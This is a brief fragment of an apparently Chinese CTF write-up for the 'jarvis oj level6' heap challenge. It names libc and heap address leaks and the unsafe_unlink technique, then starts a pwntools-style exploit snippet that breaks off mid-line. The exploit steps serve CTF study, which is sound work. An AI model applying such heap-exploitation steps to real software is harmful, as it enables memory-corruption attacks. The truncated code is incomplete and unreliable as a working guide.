jarvis oj level6

原來的附件有點問題,重新發過了. 主要用了兩個技術:1.溢出泄露libc地址,heap地址.2.unsafe_unlink,這個how2pwn上unsafe_unlink.c裏寫的很清楚. 首先看泄露libc地址 New("A"*0x80)#0 New("B"*0x80)#1 Delete(0) New("123") List() c=p.recvuntil('AAAA') leak_addr=u
相關文章
相關標籤/搜索